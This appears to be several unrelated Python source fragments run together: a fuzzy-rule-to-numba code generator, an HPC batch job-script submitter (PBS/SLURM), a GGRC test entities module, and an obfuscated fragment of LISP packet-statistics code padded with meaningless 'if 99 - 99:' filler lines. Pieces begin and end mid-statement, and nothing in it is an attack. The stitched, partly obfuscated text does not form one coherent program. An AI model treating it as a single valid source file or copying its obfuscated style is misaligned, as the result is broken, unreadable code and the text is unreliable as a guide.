spec_lines.append(' ("{}", float64),'.format(var_name))
spec_lines.append(']')
if self.no_jit:
spec_lines = map(lambda line: '# ' + line, spec_lines)
self._write_lines('', '', *spec_lines)
numba_line = '@jitclass({})'.format(spec_name)
if self.no_jit:
numba_line = '# ' + numba_line
if is_io and self.vectorize == VECTORIZE_FUNC:
if self.use_py_types:
init_head = ' def __init__(self, size: int):'
else:
init_head = ' def __init__(self, size):'
else:
init_head = ' def __init__(self):'
self._write_lines('', '',
numba_line,
'class {}:'.format(class_name),
init_head)
for var_name in var_names:
if param_values:
self._write_lines(' self.{} = {}'.format(var_name, param_values[var_name]))
elif is_io and self.vectorize == VECTORIZE_FUNC:
self._write_lines(' self.{} = np.zeros(size, dtype=np.float64)'.format(var_name))
elif self.vectorize != VECTORIZE_NONE:
self._write_lines(' self.{} = np.zeros(1, dtype=np.float64)'.format(var_name))
else:
self._write_lines(' self.{} = 0.0'.format(var_name))
def _write_rule(self, rule: List, source_level: int, target_level: int):
sub_target_level = target_level
for stmt in rule:
keyword = stmt[0]
if keyword == 'if':
sub_target_level = target_level
self._write_stmt(keyword, stmt[1], stmt[2], source_level, sub_target_level)
elif keyword == 'elif':
sub_target_level += 1
self._write_stmt(keyword, stmt[1], stmt[2], source_level, sub_target_level)
elif keyword == 'else':
self._write_stmt(keyword, None, stmt[1], source_level, sub_target_level)
elif keyword == '=':
self._write_assignment(stmt[1], stmt[2], source_level, sub_target_level)
else:
raise NotImplemented
def _write_stmt(self,
keyword: str,
condition_expr: Optional[str],
body: List,
source_level: int,
target_level: int):
not_pattern = '1.0 - {x}' # note, not using self.not_pattern here!
source_indent = (4 * source_level) * ' '
if self.vectorize == VECTORIZE_FUNC:
target_indent = 8 * ' '
else:
target_indent = 4 * ' '
t0 = 't' + str(target_level - 1)
t1 = 't' + str(target_level - 0)
if keyword == 'if' or keyword == 'elif':
condition = self.expr_gen.gen_expr(condition_expr)
if keyword == 'if':
self._write_lines('{tind}#{sind}{key} {expr}:'.format(tind=target_indent, sind=source_indent,
key=keyword, expr=condition_expr))
target_value = self.and_pattern.format(x=t0, y=condition)
else:
tp = 't' + str(target_level - 2)
self._write_lines('{tind}#{sind}{key} {expr}:'.format(tind=target_indent, sind=source_indent,
key=keyword, expr=condition_expr))
target_value = self.and_pattern.format(x=tp, y=not_pattern.format(x=t0))
self._write_lines('{tind}{tvar} = {tval}'.format(tind=target_indent, tvar=t0, tval=target_value))
target_value = self.and_pattern.format(x=t0, y=condition)
else:
self._write_lines('{tind}#{sind}else:'.format(tind=target_indent, sind=source_indent))
target_value = self.and_pattern.format(x=t0, y=not_pattern.format(x=t1))
self._write_lines('{tind}{tvar} = {tval}'.format(tind=target_indent, tvar=t1, tval=target_value))
self._write_rule(body, source_level + 1, target_level + 1)
def _write_assignment(self, var_name: str, var_value: str, source_level: int, target_level: int):
source_indent = (source_level * 4) * ' '
if self.vectorize == VECTORIZE_FUNC:
target_indent = 8 * ' '
else:
target_indent = 4 * ' '
t0 = 't' + str(target_level - 1)
_, prop_def = self._get_output_def(var_name, var_value)
prop_value, _, _ = prop_def
if prop_value == 'true()':
assignment_value = t0
elif prop_value == 'false()':
assignment_value = self.not_pattern.format(x=t0)
else:
raise ValueError('Currently you can only assign properties,'
' whose values are "true()" or "false()')
output_assignments = self.output_assignments.get(var_name)
if output_assignments is None:
output_assignments = [assignment_value]
self.output_assignments[var_name] = output_assignments
else:
output_assignments.append(assignment_value)
out_pattern = '{tval}'
if len(output_assignments) > 1:
if self.vectorize == VECTORIZE_FUNC:
out_pattern = self.or_pattern.format(x='outputs.{name}[i]', y=out_pattern)
else:
out_pattern = self.or_pattern.format(x='outputs.{name}', y=out_pattern)
if self.vectorize == VECTORIZE_FUNC:
line_pattern = '{tind}outputs.{name}[i] = ' + out_pattern
else:
line_pattern = '{tind}outputs.{name} = ' + out_pattern
self._write_lines('{tind}#{sind}{name} = {sval}'.format(tind=target_indent, sind=source_indent,
name=var_name, sval=var_value))
self._write_lines(line_pattern.format(tind=target_indent, name=var_name,
tval=assignment_value))
def _get_output_def(self, var_name: VarName, prop_name: PropName) -> Tuple[TypeName, PropDef]:
return _get_type_name_and_prop_def(var_name, prop_name, self.type_defs, self.output_defs)
def _write_lines(self, *lines):
for line in lines:
self.out_file.write('%s\n' % line)
class ExprGen:
def __init__(self,
type_defs: TypeDefs,
var_defs: VarDefs,
parameterize=False,
vectorize=VECTORIZE_NONE,
no_jit=False,
not_pattern='1.0 - ({x})',
and_pattern='min({x}, {y})',
or_pattern='max({x}, {y})'):
assert type_defs
assert var_defs
assert vectorize
assert not_pattern
assert and_pattern
assert or_pattern
self.type_defs = type_defs
self.var_defs = var_defs
self.parameterize = parameterize
self.vectorize = vectorize
self.no_jit = no_jit
self.not_pattern = not_pattern
self.and_pattern = and_pattern
self.or_pattern = or_pattern
def gen_expr(self, rule_condition: str) -> str:
mod = ast.parse(rule_condition)
body = mod.body
if len(body) != 1 or not isinstance(body[0], ast.Expr):
raise ValueError('Invalid condition expression: [{}]'.format(rule_condition))
expr = body[0].value
return self._transpile_expression(expr)
def _transpile_expression(self, expr) -> str:
if isinstance(expr, ast.Compare):
left = expr.left
if not isinstance(left, ast.Name):
raise ValueError('Left side of comparison must be the name of an input')
var_name = expr.left.id
prop_name = expr.comparators[0].id
compare_op = expr.ops[0]
if isinstance(compare_op, ast.Eq) or isinstance(compare_op, ast.Is):
if self.vectorize == VECTORIZE_FUNC:
op_pattern = '_{t}_{r}(inputs.{l}{p}[i])'
else:
op_pattern = '_{t}_{r}(inputs.{l}{p})'
elif isinstance(compare_op, ast.NotEq) or isinstance(compare_op, ast.IsNot):
if self.vectorize == VECTORIZE_FUNC:
op_pattern = self.not_pattern.format(x='_{t}_{r}(inputs.{l}{p}[i])')
else:
op_pattern = self.not_pattern.format(x='_{t}_{r}(inputs.{l}{p})')
else:
raise ValueError('"==", "!=", "is", and "is not" are the only supported comparison operators')
type_name, prop_def = _get_type_name_and_prop_def(var_name, prop_name, self.type_defs, self.var_defs)
_, func_params, _ = prop_def
if self.parameterize and func_params:
params = ', ' + ', '.join(['{p}=params.{qp}'.format(p=param_name,
qp=_get_qualified_param_name(type_name,
prop_name,
param_name))
for param_name in func_params.keys()])
else:
params = ''
return op_pattern.format(t=type_name, r=prop_name, l=var_name, p=params)
if isinstance(expr, ast.UnaryOp):
op = expr.op
if isinstance(op, ast.Not):
op_pattern = self.not_pattern
else:
raise ValueError('"not" is the only supported unary operator')
v = expr.operand
t = self._transpile_expression(v)
return op_pattern.format(x=t)
if isinstance(expr, ast.BoolOp):
op = expr.op
if isinstance(op, ast.And):
op_pattern = self.and_pattern
elif isinstance(op, ast.Or):
op_pattern = self.or_pattern
else:
raise ValueError('"and" and "or" are the only supported binary operators')
t1 = None
for v in expr.values:
if t1 is None:
t1 = self._transpile_expression(v)
else:
t2 = self._transpile_expression(v)
t1 = op_pattern.format(x=t1, y=t2)
return t1
raise ValueError('Unsupported expression')
def _types_to_type_defs(types: Dict[str, Dict[str, str]]) -> TypeDefs:
type_defs = OrderedDict()
for type_name, type_properties in types.items():
type_def = {}
type_defs[type_name] = type_def
for prop_name, prop_value in type_properties.items():
try:
prop_result = eval(prop_value, vars(propfuncs), | |
<reponame>SPIDER-CMB/xfaster<filename>xfaster/batch_tools.py<gh_stars>1-10
import os
import stat
import shutil
import subprocess as sp
import tempfile
import re
import datetime as dt
from warnings import warn
import numpy as np
import argparse as ap
__all__ = ["get_job_logfile", "batch_sub", "batch_group", "JobArgumentParser"]
def get_job_logfile():
"""
Generate a path to use for the output log, based on job environment
Returns
-------
logfile : str
Path to log file.
"""
if os.getenv("PBS_O_WORKDIR"):
if os.getenv("PBS_ENVIRONMENT") != "PBS_INTERACTIVE":
workdir = os.getenv("PBS_O_WORKDIR")
jobname = os.getenv("PBS_JOBNAME")
jobid = os.getenv("PBS_JOBID").split(".", 1)[0]
logfile = os.path.join(workdir, "{}.u{}".format(jobname, jobid))
else:
logfile = None
elif os.getenv("SLURM_SUBMIT_DIR"):
workdir = os.getenv("SLURM_SUBMIT_DIR")
jobname = os.getenv("SLURM_JOB_NAME")
jobid = os.getenv("SLURM_JOB_ID").split(".", 1)[0]
if jobname == "bash":
logfile = None
else:
logfile = os.path.join(workdir, "{}-{}.log".format(jobname, jobid))
# TODO generate different logs for multiple processes in same job?
else:
logfile = None
return logfile
def format_time(t):
"""
Format a time to string for use by qsub.
Arguments
---------
t : datetime.timedelta object or float
The time for the job.
If floating point, will be interpreted in hours
Returns
-------
time : str
Time in the format expected by scheduler.
"""
if isinstance(t, str):
m = re.match("([0-9]+):([0-9]{2}):([0-9]{2})", t)
if not m:
raise ValueError("unable to parse qsub time string")
hh, mm, ss = map(int, m.groups())
t = dt.timedelta(hours=hh, minutes=mm, seconds=ss)
if not isinstance(t, dt.timedelta):
t = dt.timedelta(hours=t)
if t <= dt.timedelta(0):
raise ValueError("qsub time must be positive")
hours, rem = divmod(t.seconds + t.days * 86400, 3600)
minutes, seconds = divmod(rem, 60)
return "{:d}:{:02d}:{:02d}".format(hours, minutes, seconds)
def batch_sub(
cmd,
name=None,
mem=None,
nodes=None,
node_list=None,
ppn=None,
cput=None,
wallt=None,
output=None,
error=None,
queue=None,
dep_afterok=None,
workdir=None,
batch_args=[],
omp_threads=None,
mpi_procs=None,
mpi_args="",
env_script=None,
env=None,
nice=0,
echo=True,
delete=True,
submit=True,
scheduler="pbs",
debug=False,
exclude=None,
verbose=False,
):
"""
Create and submit a SLURM or PBS job.
Arguments
---------
cmd : string or list of strings
A command sequence to run via SLURM or PBS.
The command will be inserted into a qsub submission script
with all of the options specified in the remaining arguments.
name : string, optional
Name of the job.
mem : float or string, optional
Amount of memory to request for the job. float values in GB.
Or pass a string (eg '4gb') to use directly.
nodes : int or string, optional
Number of nodes to use in job
If a string, will be passed as-is to PBS -l node= resource
If using SLURM and a string, will overwrite node_list if None
node_list : string or list of strings
List of nodes that can be used for job. SLURM-only.
ppn : int, optional
Numper of processes per node
cput : string or float or datetime.timedelta, optional
Amount of CPU time requested.
String values should be in the format HH:MM:SS, e.g. '10:00:00'.
Numerical values are interpreted as a number of hours.
wallt : string or float or datetime.timedelta, optional
Amount of wall clock time requested.
String values should be in the format HH:MM:SS, e.g. '10:00:00'.
Numerical values are interpreted as a number of hours.
output : string, optional
PBS standard output filename.
error : string, optional
PBS error output filename.
queue : string, optional
The name of the queue to which to submit jobs
dep_afterok : string or list of strings
Dependency. Job ID (or IDs) on which to wait for successful completion,
before starting this job
workdir : string, optional
Directory from where the script will be submitted.
This is where the output and error files will be created
by default. Default: current directory.
batch_args : string or list of strings, optional
Any additional arguments to pass to slurm/pbs.
omp_threads : int, optional
Number of OpenMP threads to use per process
mpi_procs : int
Number of MPI processes to use.
``mpirun`` calls will be added to all lines of cmd as needed.
If cmd contains ``mpirun`` or ``mpiexec``, this does nothing.
mpi_args : string
Additional command line arguments for inserted ``mpirun`` commands.
If cmd contains ``mpirun`` or ``mpiexec``, this does nothing.
env_script : string, optional
Path to script to source during job script preamble
For loading modules, setting environment variables, etc
env : dict, optional
Dictionary of environment variables to set in job script
nice : int, optional
Adjust scheduling priority (SLURM only). Range from -5000 (highest
priority) to 5000 (lowest priority).
Note: actual submitted --nice value is 5000 higher, since negative
values require special privilege.
echo : bool, optional
Whether to use bash "set -x" in job script to echo commands to stdout.
delete : bool, optional
If True, delete the submit script upon job submission.
submit : bool, optional
If True (default) submit the job script once create. Will override the
default option when False, to keep the script
scheduler : string, optional
Which scheduler system to write a script for. One of "pbs" or "slurm"
debug : bool, optional
If True, print the contents of the job script to stdout for debugging.
exclude : string or list of strings
List of nodes that will be excluded for job. SLURM-only.
verbose : bool, optional
Print the working directory, and the job ID if submitted successfully.
Returns
-------
jobid : string
The ID of the submitted job.
Example
-------
>>> jobid = batch_sub("echo Hello", name="testing", nodes="1:ppn=1",
... cput='1:00:00', mem='1gb')
>>> print(jobid)
221114.feynman.princeton.edu
>>> print(open('testing.o221114','r').read())
Hello
"""
if isinstance(cmd, list):
cmd = " ".join(cmd)
scheduler = scheduler.lower()
if mem is not None and not isinstance(mem, str):
if mem < 0:
mem = None
elif scheduler == "pbs":
mem = "{:d}mb".format(int(np.ceil(mem * 1024.0)))
elif scheduler == "slurm":
mem = "{:d}".format(int(np.ceil(mem * 1024.0)))
if isinstance(dep_afterok, str):
dep_afterok = [dep_afterok]
if isinstance(batch_args, str):
batch_args = batch_args.split()
if not debug and not submit:
delete = False
try:
nodes = int(nodes)
except ValueError:
# nodes is a string that's not convertible to int
if scheduler == "slurm" and node_list is None:
node_list = nodes
nodes = 1
job_script = ["#!/usr/bin/env bash"]
# TODO can maybe replace manual option with some automatic detection
if scheduler == "pbs":
# create PBS header
if name:
job_script += ["#PBS -N {:s}".format(name)]
if mem:
job_script += ["#PBS -l mem={:s}".format(mem)]
if nodes and ppn:
job_script += ["#PBS -l nodes={}:ppn={}".format(nodes, ppn)]
if cput:
job_script += ["#PBS -l cput={:s}".format(format_time(cput))]
if wallt:
job_script += ["#PBS -l walltime={:s}".format(format_time(wallt))]
if output:
job_script += ["#PBS -o {:s}".format(output)]
if error:
job_script += ["#PBS -e {:s}".format(error)]
if queue:
job_script += ["#PBS -q {:s}".format(queue)]
if dep_afterok:
job_script += ["#PBS -W depend=afterok:{}".format(":".join(dep_afterok))]
elif scheduler == "slurm":
# create slurm header
if name:
job_script += ["#SBATCH --job-name={:s}".format(name)]
if mem:
job_script += ["#SBATCH --mem={:s}".format(mem)]
if nodes:
job_script += ["#SBATCH --nodes={}".format(nodes)]
if node_list is not None:
if len(node_list) > 1 and not isinstance(node_list, str):
node_list = ",".join(node_list)
job_script += ["#SBATCH --nodelist={}".format(node_list)]
if exclude is not None:
if len(exclude) > 1 and not isinstance(exclude, str):
exclude = ",".join(exclude)
elif len(exclude) == 1 and not isinstance(exclude, str):
exclude = exclude[0]
job_script += ["#SBATCH --exclude={}".format(exclude)]
if ppn:
job_script += ["#SBATCH --ntasks-per-node={}".format(ppn)]
if omp_threads:
job_script += ["#SBATCH --cpus-per-task={}".format(omp_threads)]
if cput:
if wallt is None:
warn("Using CPU time as wall time for slurm")
job_script += ["#SBATCH --time={:s}".format(format_time(cput))]
else:
warn("Ignoring CPU time for slurm, using wall time only")
if wallt:
job_script += ["#SBATCH --time={:s}".format(format_time(wallt))]
if nice is not None:
nice += 5000
job_script += ["#SBATCH --nice={}".format(nice)]
if output:
job_script += ["#SBATCH --output={:s}".format(output)]
if error:
job_script += ["#SBATCH --error={:s}".format(error)]
if queue:
job_script += ["#SBATCH --partition={:s}".format(queue)]
if dep_afterok:
job_script += [
"#SBATCH --dependency=afterok:{}".format(":".join(dep_afterok))
]
# create job script preamble
if echo:
job_script += ["set -x"]
if env_script:
if not os.path.exists(env_script):
raise ValueError("Could not find environment script: {}".format(env_script))
job_script += ["source {}".format(env_script)]
if env:
for k, v in env.items():
job_script += ["export {}={}".format(k, v)]
if scheduler == "pbs":
job_script += ["cd $PBS_O_WORKDIR"]
elif scheduler == "slurm":
job_script += ["cd $SLURM_SUBMIT_DIR"]
if omp_threads:
job_script += ["export OMP_NUM_THREADS={}".format(omp_threads)]
# finally, add the command string to script
if mpi_procs is not None:
if "mpirun" not in cmd and "mpiexec" not in cmd:
mpi = "mpiexec -n {:d} {:s} ".format(mpi_procs, mpi_args)
cmd = "\n".join(
[(mpi + line) | |
<gh_stars>1-10
# Copyright (C) 2020 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Create, description, representation and equal of entities."""
# pylint: disable=too-many-arguments
# pylint: disable=too-few-public-methods
# pylint: disable=inconsistent-return-statements
import copy
from datetime import date, datetime
from dateutil import parser, tz
from lib.entities import mixin
from lib.utils import help_utils
from lib.utils.string_utils import StringMethods
class Representation(object):
"""Class to operate with entities' representation."""
# pylint: disable=too-many-public-methods
diff_info = None # {"equal": {"atr7": val7, ...}, "diff": {"atr3": val3}}
tree_view_attrs_to_exclude = (
"created_at", "updated_at", "custom_attributes", "assertions",
"external_slug", "external_id", "review")
people_attrs_names = [
"creators", "assignees", "verifiers", "admins", "primary_contacts",
"secondary_contacts", "audit_captains", "auditors",
"control_operators", "control_owners",
"principal_assignees", "secondary_assignees", "managers", "editors",
"readers"] # multiply
@property
def attrs_names(self):
"""Entity instance's attributes names according to class model."""
return self.get_attrs_names(self.__class__)
@property
def attrs_names_to_repr(self):
"""Entity instance's attributes names w/o REST and exclude
'custom_attribute_definitions', 'custom_attribute_values'.
"""
# todo: add logic to getting 'url', 'id' via UI services
return [attr_name for attr_name in self.attrs_names if attr_name not in [
"custom_attribute_definitions", "custom_attribute_values", "href",
"url", "id"]]
@classmethod
def all_attrs_names(cls):
"""All possible entities' attributes names include REST."""
return list(set(cls.get_attrs_names() + [
"access_control_list", "recipients", "default_people",
"modal_title", "assignee_type", "user_roles", "link", "kind"]))
@classmethod
def get_attrs_names(cls, entity=None):
"""Get list unique entities attributes' names. If 'entity' then get
attributes of one entered entity, else get attributes of all entities.
"""
all_entities_cls = (help_utils.convert_to_list(entity) if entity
else list(Entity.all_entities_classes()))
all_entities_attrs_names = StringMethods.convert_list_elements_to_list(
[entity_cls().__dict__.keys() for entity_cls in all_entities_cls])
return list(set(all_entities_attrs_names))
def __repr__(self):
"""Dictionary representation for entity."""
return str(dict(
zip(self.attrs_names_to_repr,
[getattr(self, attr_name_to_repr) for
attr_name_to_repr in self.attrs_names_to_repr])))
@staticmethod
def remap_collection():
"""Get transformation dictionary {'OLD KEY': 'NEW KEY'}, where
'OLD KEY' - UI elements and CSV fields correspond to
'NEW KEY' - objects attributes.
"""
from lib.constants import element, files
els = element.TransformationElements
csv = files.TransformationCSVFields
# common for UI and CSV
result_remap_items = {
els.TITLE: "title", els.ADMIN: "admins",
els.CODE: "slug", els.REVIEW_STATE: "review_status",
els.OBJECT_REVIEW: "os_state",
els.STATE: "status"
}
ui_remap_items = {
els.PROGRAM_MANAGERS: "managers", els.VERIFIED: "verified",
els.STATUS: "status", els.LAUNCH_STATUS: "status",
els.LAST_UPDATED: "updated_at",
els.AUDIT_CAPTAINS: "audit_captains",
els.AUDITORS: "auditors",
els.CREATED_AT: "created_at",
"MAPPED_OBJECTS": "mapped_objects", els.ASSIGNEES: "assignees",
els.CREATORS: "creators", "VERIFIERS": "verifiers",
"COMMENTS": "comments", "CREATED_AT": "created_at",
els.MODIFIED_BY: "modified_by", "LAST_UPDATED_BY": "modified_by",
"UPDATED_AT": "updated_at", "ASSESSMENT_TYPE": "assessment_type",
els.ASMT_TYPE: "assessment_type",
els.RECIPIENTS: "recipients",
"IS_VERIFIED": "verified",
"CUSTOM_ATTRIBUTES": "custom_attributes",
"DESCRIPTION": "description",
"EVIDENCE_URLS": "evidence_urls",
"ASSERTIONS": "assertions",
"EXTERNAL_SLUG": "external_slug",
"EXTERNAL_ID": "external_id",
"REVIEW_STATUS": "review_status",
"REVIEW_STATUS_DISPLAY_NAME": "review_status_display_name",
"PRIMARY_CONTACTS": "primary_contacts",
"CONTROL_OPERATORS": "control_operators",
"CONTROL_OWNERS": "control_owners",
"URL": "url",
"ID": "id", "Risk Type": "risk_type",
"REVIEW": "review"
}
csv_remap_items = {
csv.REVISION_DATE: "updated_at", "REVIEW STATUS": "review_status",
"REVIEW_STATUS_DISPLAY_NAME": "review_status_display_name"
}
result_remap_items.update(ui_remap_items)
result_remap_items.update(csv_remap_items)
return StringMethods.dict_keys_to_upper_case(result_remap_items)
@staticmethod
def repr_obj_to_dict(objs):
"""Convert objects' representation to dictionary 'obj.attr_name' =
'attr_value' to dictionary or list of dictionaries with items
{'attr_name': 'attr_value'}.
"""
if objs or isinstance(objs, bool):
if isinstance(objs, list):
if (all(not isinstance(_, dict) and
not isinstance(_, (str, unicode, int)) and
_ for _ in objs)):
objs = [_.__dict__ for _ in objs]
else:
if isinstance(objs, date):
objs = objs.__str__()
elif (not isinstance(objs, dict) and
not isinstance(objs, (str, unicode, int))):
objs = objs.__dict__
return objs
@staticmethod
def repr_dict_to_obj(dic):
"""Convert dictionary to Entity representation (dictionary's keys and
values to attributes names and attributes values).
"""
# pylint: disable=expression-not-assigned
# pylint: disable=consider-iterating-dictionary
entity = Entity()
[setattr(entity, k, v) for k, v in dic.iteritems()]
return entity
def repr_ui(self):
"""Convert entity's attributes values from REST like to UI like
representation.
"""
return self.convert_repr_rest_to_ui(objs=self)
def tree_item_representation(self):
"""Make object's copy and convert it to the view of tree item."""
obj = copy.deepcopy(self)
for attr in obj.tree_view_attrs_to_exclude:
setattr(obj, attr, None)
from lib.service import rest_service
new_modified_by_value = getattr(rest_service.ObjectsInfoService().get_obj(
obj=obj.repr_dict_to_obj(obj.modified_by)), "email")
obj.modified_by = new_modified_by_value
return obj
@classmethod # noqa: ignore=C901
def convert_repr_rest_to_ui(cls, objs):
"""Convert object's or objects' attributes values from REST like
(dict or list of dict) representation to UI like with unicode.
Examples:
None to None, u'Ex' to u'Ex', [u'Ex1', u'Ex2', ...] to u'Ex1, Ex2',
{'name': u'Ex', ...} to u'Ex',
[{'name': u'Ex1', ...}, {'name': u'Ex2', ...}] to u'Ex1, Ex2'
"""
# pylint: disable=too-many-locals
# pylint: disable=undefined-loop-variable
# pylint: disable=invalid-name
def convert_repr_rest_to_ui(obj):
"""Convert object's attributes from REST to UI like representation."""
def convert_attr_val_repr_dict_to_unicode(attr_name, attr_value):
"""Convert attribute value from dictionary to unicode representation
(get value by key from dictionary 'attr_value' where key determine
according to 'attr_name').
"""
if isinstance(attr_value, dict):
converted_attr_value = attr_value
if attr_name in Representation.people_attrs_names + [
"created_by", "modified_by"
]:
converted_attr_value = unicode(attr_value.get("email"))
if attr_name in ["custom_attribute_definitions", "program", "audit",
"mapped_objects"]:
converted_attr_value = (
unicode(attr_value.get("title")) if
attr_name != "custom_attribute_definitions" else
{attr_value.get("id"): attr_value.get("title").upper()}
)
if attr_name in ["custom_attribute_values"]:
converted_attr_value = {attr_value.get("custom_attribute_id"):
attr_value.get("attribute_value")}
if obj_attr_name == "comments":
converted_attr_value = {
k: (parser.parse(v).replace(tzinfo=tz.tzutc()) if
k == "created_at" and isinstance(v, unicode) else v)
for k, v in attr_value.iteritems()
if k in ["modified_by", "created_at", "description"]}
if attr_name == "assertions":
for name, assertion_id in ControlEntity.ASSERTIONS.iteritems():
if assertion_id == attr_value["id"]:
converted_attr_value = name
return converted_attr_value
origin_obj = copy.deepcopy(obj)
for obj_attr_name in obj.__dict__.keys():
# 'Ex', u'Ex', 1, None to 'Ex', u'Ex', 1, None
obj_attr_value = getattr(obj, obj_attr_name)
# REST like u'08-20-2017T04:30:45' to date=2017-08-20,
# timetz=04:30:45+00:00
if (obj_attr_name in ["updated_at", "created_at"] and
isinstance(obj_attr_value, unicode)):
obj_attr_value = (parser.parse(obj_attr_value).
replace(tzinfo=tz.tzutc()))
if isinstance(obj_attr_value, dict) and obj_attr_value:
# "modified_by" {"type": "Person", "id": x} to u'<EMAIL>'
# todo: deprecated?
if obj_attr_name == "modified_by":
from lib.service import rest_service
obj_attr_value = getattr(rest_service.ObjectsInfoService().get_obj(
obj=Representation.repr_dict_to_obj(obj_attr_value)), "email")
# {'name': u'Ex1', 'type': u'Ex2', ...} to u'Ex1'
else:
obj_attr_value = convert_attr_val_repr_dict_to_unicode(
obj_attr_name, obj_attr_value)
# [el1, el2, ...] or [{item1}, {item2}, ...] to [u'Ex1, u'Ex2', ...]
if (isinstance(obj_attr_value, list) and
all(isinstance(item, dict) for item in obj_attr_value)):
obj_attr_value = [
convert_attr_val_repr_dict_to_unicode(obj_attr_name, item) for
item in obj_attr_value]
setattr(obj, obj_attr_name, obj_attr_value)
# merge "custom_attribute_definitions" and "custom_attribute_values"
obj_cas_attrs_names = [
"custom_attributes", "custom_attribute_definitions",
"custom_attribute_values"]
if set(obj_cas_attrs_names).issubset(obj.__dict__.keys()):
cas_def = obj.custom_attribute_definitions
cas_val = obj.custom_attribute_values
# form CAs values of CAs definitions exist but CAs values not, or CAs
# definitions have different then CAs values lengths
if (cas_def and
(not cas_val or (isinstance(cas_def and cas_val, list)) and
len(cas_def) != len(cas_val))):
from lib.entities.entities_factory import (
CustomAttributeDefinitionsFactory)
cas_val_dicts_keys = ([_.keys()[0] for _ in cas_val] if
isinstance(cas_val, list) else [None])
_cas_val = [
{k: v} for k, v in
CustomAttributeDefinitionsFactory.generate_ca_title_id(
[Representation.repr_dict_to_obj(cad)
for cad in origin_obj.custom_attribute_definitions]
).iteritems() if k not in cas_val_dicts_keys]
cas_val = _cas_val if not cas_val else cas_val + _cas_val
cas_def_dict = (
dict([_def.iteritems().next() for _def in cas_def]) if
(isinstance(cas_def, list) and
all(isinstance(_def, dict)
for _def in cas_def)) else None)
cas_val_dict = (
dict([_val.iteritems().next() for _val in cas_val]) if
(isinstance(cas_def, list) and
all(isinstance(_def, dict)
for _def in cas_def)) else None)
cas = StringMethods.merge_dicts_by_same_key(cas_def_dict, cas_val_dict)
if obj.custom_attributes:
cas.update(obj.custom_attributes)
if cas in [{None: None}, {}]:
cas = None
setattr(obj, "custom_attributes", cas)
return obj
return help_utils.execute_method_according_to_plurality(
objs=objs, types=Entity.all_entities_classes(),
method_name=convert_repr_rest_to_ui)
def repr_snapshot(self, parent_obj):
"""Convert entity's attributes values to Snapshot representation."""
return (self.convert_repr_to_snapshot(
obj=self, parent_obj=parent_obj))
def repr_min_dict(self):
"""Get and return entity's minimal dictionary representation w/
'type', 'id' keys, e.g. {'type': 'Control', 'id': 1}
"""
return {"type": getattr(self, "type"),
"id": getattr(self, "id")}
@classmethod # noqa: ignore=C901
def convert_repr_to_snapshot(cls, obj, parent_obj):
"""Convert object's or objects' attributes values to Snapshot
representation.
Retrieved values will be used for: 'id'.
Set values will be used for: 'title, 'type', 'slug', 'href'.
"""
def convert_repr_to_snapshot(origin_obj, parent_obj):
"""Convert object's attributes to Snapshot representation."""
from lib.service import rest_service
origin_obj = copy.deepcopy(origin_obj)
snapshoted_obj = (
rest_service.ObjectsInfoService().get_snapshoted_obj(
origin_obj=origin_obj, paren_obj=parent_obj))
origin_obj.__dict__.update(
{k: v for k, v in snapshoted_obj.__dict__.iteritems()})
return origin_obj
return help_utils.execute_method_according_to_plurality(
objs=obj, types=Entity.all_entities_classes(),
method_name=convert_repr_to_snapshot, parent_obj=parent_obj)
def update_attrs(self, is_replace_attrs=True, is_allow_none=True,
is_replace_dicts_values=False, **attrs):
"""Update entity's attributes values according to entered data
(dictionaries of attributes and values).
If 'is_replace_values_of_dicts' then update values of dicts in list which
is value of particular object's attribute name.
"""
return (self.update_objs_attrs_values(
objs=self, is_replace_attrs_values=is_replace_attrs,
is_allow_none_values=is_allow_none,
is_replace_values_of_dicts=is_replace_dicts_values, **attrs))
def delete_attrs(self, *attrs_names):
"""Delete entity's attributes according to '*attrs_names'."""
# pylint: disable=expression-not-assigned
[delattr(self, attr_name)
for attr_name in attrs_names if hasattr(self, attr_name)]
def set_attrs(self, *attrs_names, **attrs):
"""Set entity's attributes according to '**attrs' items if key and value
are corresponding, otherwise set values to None where '*attrs_names'
is keys.
"""
# pylint: disable=expression-not-assigned
[setattr(self, attr_name, attrs.get(attr_name))
for attr_name in attrs_names]
@classmethod
def update_objs_attrs_values(
cls, objs, is_replace_attrs_values=True,
is_allow_none_values=True, is_replace_values_of_dicts=False, **attrs
):
"""Update object or list of objects ('objs') attributes values by
manually entered data if attribute name exist in 'attrs_names' witch equal
to 'all_objs_attrs_names' according to dictionary of attributes and values
| |
/ 1000000
OOoOO0 = round ( OOoOO0 , 2 )
if 99 - 99: IiII / OoO0O00 % Oo0Ooo * iIii1I11I1II1
if 89 - 89: I1Ii111 + Oo0Ooo - ooOoO0o
if 63 - 63: oO0o + OoOoOO00 - oO0o - Ii1I % ooOoO0o * I1Ii111
if 92 - 92: IiII % IiII / o0oOOo0O0Ooo * OoO0O00 % OoOoOO00
if 12 - 12: I1IiiI
iI1IiIiIIII11 = self . normalize ( self . packet_count )
oOooO0O0 = self . normalize ( self . byte_count )
if 83 - 83: o0oOOo0O0Ooo * Oo0Ooo - oO0o + O0 / i11iIiiIii
if 64 - 64: OoO0O00 % OoOoOO00 % I1IiiI - Ii1I / IiII * Ii1I
if 74 - 74: IiII - O0 % OOooOOo % OoooooooOO - I11i
if 4 - 4: i1IIi + OoOoOO00 + iIii1I11I1II1 - i1IIi * i11iIiiIii
if 99 - 99: I1ii11iIi11i - O0 % II111iiii + ooOoO0o % OoO0O00 * Ii1I
if ( summary ) :
i1I1ii111 = "<br>" if html else ""
iI1IiIiIIII11 , oOooO0O0 = self . stat_colors ( iI1IiIiIIII11 , oOooO0O0 , html )
OO0ooo0O = "packet-count: {}{}byte-count: {}" . format ( iI1IiIiIIII11 , i1I1ii111 , oOooO0O0 )
OooOooo = "packet-rate: {} pps\nbit-rate: {} Mbps" . format ( iiiiiI1I1 , OOoOO0 )
if 19 - 19: O0 / I1Ii111 + I1Ii111 . I1ii11iIi11i
if ( html != "" ) : OooOooo = lisp_span ( OO0ooo0O , OooOooo )
else :
II11 = str ( iiiiiI1I1 )
iI1II1IiIiIi = str ( OOoOO0 )
if ( html ) :
iI1IiIiIIII11 = lisp_print_cour ( iI1IiIiIIII11 )
II11 = lisp_print_cour ( II11 )
oOooO0O0 = lisp_print_cour ( oOooO0O0 )
iI1II1IiIiIi = lisp_print_cour ( iI1II1IiIiIi )
if 9 - 9: I1Ii111 * II111iiii % Ii1I - Ii1I % OoO0O00 % o0oOOo0O0Ooo
i1I1ii111 = "<br>" if html else ", "
